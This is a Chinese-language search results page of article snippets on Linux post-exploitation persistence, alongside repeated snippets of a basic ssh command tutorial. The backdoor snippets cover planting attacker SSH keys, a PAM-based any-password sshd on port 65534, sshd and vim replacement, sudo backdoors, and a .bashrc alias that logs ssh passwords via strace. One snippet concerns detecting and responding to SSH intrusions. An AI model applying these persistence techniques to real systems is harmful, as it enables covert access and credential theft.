首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
您找到你想要的搜索结果了吗?
是的
没有找到

权限维持Linux后门

在渗透过程中拿到目标权限只是开始,通常会留下后门以便再次访问(简称APT)。因此需要进行权限维持,隐藏后门。本文将对Linux下常见的权限维持后门技术进行解析,知己知彼百战不殆。...(不通操作系统文件不同) 4.写入SSH公钥 原理:Linux主机打开了SSH时默认也开启了密钥登陆,故写入ssh公钥,即可留下一条控制系统的路 ssh-keygen -t rsa #生成ssh密钥对...登录背的主机密码在日志中直接搜索"password"字符串即可 6.SSH任意密码登录后门 原理:SSH登录默认使用PAM进行认证,而在root条件下,部分命令比如su,chfn等在执行时,无需使用密码...-p 65534 x.x.x.x登录,密码随意输入 7.SSH认证流程后门 原理:ssh登录时,系统处理登录请求的文件时usr/sbin/sshd,那么就可以修改该文件,在登录时执行特定操作。...则会修改目录下root文件,也相当于crontab -e 还有许多其它执行计划任务的文件及相关文件 11.预加载动态链接库 原理:系统执行一些命令的时候,在真正执行其文件之前,会加载相应的动态链接库,但linux

2K20

系统安全SSH入侵的检测与响应

在这篇文章中还介绍到了课程大纲包含主机安全、web安全、后门/木马等等,下面就让我们开始我们的实验课程。 二、课程目标 首先第一个课程是主机安全的ssh端口入侵&检测&响应课程。...ssh victim@192.168.171.121 输入密码后正常登陆: ? 3)创建SSH免密登陆 3.1)现在攻击主机上生成公钥信息 ssh-keygen -t rsa ?...至此基本的SSH攻击已经结束了,思路很简单这个应该是基本功无压力。下面的过程就比较有收获了。 五、响应方法 1. 登陆目标主机关闭ssh服务、查看被爆破成功账户、判断是否存在ssh免密登陆。...grep ssh ?...至此,这个课题就此结束,期间也是碰到各种问题,拖延了不少时间,好在最终是搞定了,希望大家能够在这里有所收获,也希望大家能够指出文章的不足之处,共勉

3.5K20

渗透测试|Linux下的ssh免密登录后门

hitokoto.innerText = data.hitokoto; } } xhr.send(); 前言 相信大家在做渗透测试的时候,会遇到后渗透阶段的权限维持问题,常见的linux...后门有crontab后门(在计划任务里添加反弹shell任务),超级用户后门(也就是uid=0的用户),ssh免密登录后门等等等~~~[aru_5],当然你有能力的话,可以试试破解root密码~~这里我就详细的教大家如何利用...ssh后门和计划任务后门(下次讲,这次懒得写了~)进行权限维持。...ssh免密登录后门 ssh免密登录就是在自己的攻击机上生成一个密钥,然后把他放进目标主机的ssh密钥存放文件里(个人理解~),然后攻击机就可以拿着这个密钥直接连接目标主机了,不需要密码,当然后门嘛,...chmod 700 ~/.ssh 详细操作可看下图: 4.在攻击机上使用免密登录测试 ssh -i /root/.ssh/id_rsa root@目标ip 测试截图如下: 可以看到不用密码就直接进入了目标服务器

2K20

linuxssh命令

ssh链接远程服务器 > ssh rumenz@test.com 默认端口是22 ssh链接远程服务器,并指定端口 SSH 默认连接到目标主机的 22 端口上, 但是由于各种原因你可能需要连接到其他端口...远程执行命令 > ssh rumenz@test.com "ls -l" //多个命令中间用;隔开 > ssh rumenz@test.com "ls -l;pwd" SSH无密码登录 在自己的Linux...> ssh-copy-id rumenz@test.com 输入远程用户的密码后,SSH公钥就会自动上传了.SSH公钥保存在远程Linux服务器的~/.ssh/authorized_keys文件中....SSH 指定密钥,连接远程服务器 > ssh -i /root/.ssh/rumenz.id.rsa rumenz@test.com -p 23 /root/.ssh/rumenz.id.rsa 密钥文件路径...rumenz@test.com 需要连接的服务器用户名 & IP -p 23 端口23 原文链接:https://rumenz.com/rumenbiji/linux-ssh.html

5.8K10

linuxssh命令

ssh链接远程服务器 > ssh rumenz@test.com 默认端口是22 ssh链接远程服务器,并指定端口 SSH 默认连接到目标主机的 22 端口上, 但是由于各种原因你可能需要连接到其他端口...远程执行命令 > ssh rumenz@test.com "ls -l" //多个命令中间用;隔开 > ssh rumenz@test.com "ls -l;pwd" SSH无密码登录 在自己的Linux...ssh-copy-id rumenz@test.com 输入远程用户的密码后,SSH公钥就会自动上传了.SSH公钥保存在远程Linux服务器的~/.ssh/authorized_keys文件中....SSH 指定密钥,连接远程服务器 > ssh -i /root/.ssh/rumenz.id.rsa rumenz@test.com -p 23 /root/.ssh/rumenz.id.rsa 密钥文件路径...rumenz@test.com 需要连接的服务器用户名 & IP -p 23 端口23 原文链接:https://rumenz.com/rumenbiji/linux-ssh.html 微信公众号:入门小站

2.4K20

linuxssh命令

ssh链接远程服务器 > ssh rumenz@test.com 默认端口是22 ssh链接远程服务器,并指定端口 SSH 默认连接到目标主机的 22 端口上, 但是由于各种原因你可能需要连接到其他端口...远程执行命令 > ssh rumenz@test.com "ls -l" //多个命令中间用;隔开 > ssh rumenz@test.com "ls -l;pwd" SSH无密码登录 在自己的Linux...ssh-copy-id rumenz@test.com 输入远程用户的密码后,SSH公钥就会自动上传了.SSH公钥保存在远程Linux服务器的~/.ssh/authorized_keys文件中....SSH 指定密钥,连接远程服务器 > ssh -i /root/.ssh/rumenz.id.rsa rumenz@test.com -p 23 /root/.ssh/rumenz.id.rsa 密钥文件路径...rumenz@test.com 需要连接的服务器用户名 & IP -p 23 端口23 原文链接:https://rumenz.com/rumenbiji/linux-ssh.html 微信公众号:入门小站

3.7K00

Vim 后门 | Linux 后门系列

背景颜色来判断最终结果 默认背景颜色为 dark 系统配置背景颜色为 dark 用户配置背景颜色为白色 现在打开 1.txt 查看背景颜色 配置最终以用户配置为准,但是似乎背景颜色没有改成白色,难道是 ssh...环境变量的方式进行配置 果然,$VIMRUNTIME 是从 Linux 操作系统的环境变量来的 因此永久修改 VIMRUNTIME 不一定会修改 runtimepath ,只有通过Linux...,相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门 这类后门比较简单粗暴,直接替换相关文件,暂时未发现 vim 存在自身使用的 .so 共享库文件,因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法

52351

linux操作系统安全连接客户端ssh命令

ssh命令是openssh套件中的客户端连接工具,可以给予ssh加密协议实现安全的远程登录服务器,实现对服务器的远程管理。...语法格式: ssh [参数] [远程主机] 常用参数: -1 强制使用ssh协议版本1 -2 强制使用ssh协议版本2 -4 强制使用IPv4地址 -6 强制使用IPv6地址 -A 开启认证代理连接转发功能...-a 关闭认证代理连接转发功能 -b 使用本机指定的地址作为对位连接的源IP地址 -C 请求压缩所有数据 -F 指定ssh指令的配置文件,默认的配置文件为“/etc/ssh/ssh_config...xxx.xxx.xxx.xxx 用test用户连接远程服务器: [root@xxx ~]# ssh -l test xxx.xxx.xxx.xxx 查看分区列表: [root@xxx ~]# ssh...xxx.xxx.xxx.xxx /sbin/fdisk -l 强制使用ssh协议版本1: [root@xxx ~]# ssh -1 开启认证代理连接转发功能: [root@xxx ~]# ssh -A

1.6K00

sudo 后门Linux 后门系列

sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常的应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit

27310

alias后门 | Linux 后门系列

/etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout /etc/profile 【系统级】Linux...也是存在的,所以这些都是"藏污纳垢"的好地方 0x03 alias 后门分析&制作 当前用户目录下.bashrc alias ssh='strace -o /tmp/sshpwd-`date '+%d...%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...只是做了一个小技巧,而不是主要的后门命令,含义也就是将当前用户的ssh命令修改为 strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,...可以看到我们之前提交的数据,同时呢,这个文件返回的内容也比较多,只要改一个好点的名字可能会让安全管理人员认为是正常的文件 这种后门的场景就是用户登录到这台主机上后,使用这台主机的ssh去远程连接其他主机才能引发后门

7.4K30

渗透基础-SSH后门分析总结

对于UNIX系统来说,ssh服务端作为最广泛应用的远程管理服务并且有一定对外开放的必然性,必然引起黑客关注,所以ssh类的后门也是unix下最经典的后门方式之一了。...目前,所谓openssh,Dropbear SSH等,都是ssh协议的工具体现 所谓后门是在渗透完成之后的阶段,攻击者获取到一台服务器的root权限后,需要通过后门长期能够控制这台服务器...爆发时间:2007年就存在,2014年卷土重来 SSh后门: 该恶意软件绑定了一个Dropbear SSH后门后门程序如下: Set WshShell = CreateObject(“WScript.Shell...: 后门行为:这里的后门实际上完全是正常的程序功能,只不过人们使用了该ssh功能写了一个远程连接的工具而已。.../custom-ssh-backdoor,该工具是通过python的paramiko库自己实现了个ssh功能的软件,然后安装在服务端上 比较缺乏的是,github上大部分的后门软件都只是实现了ssh的功能

3K40
领券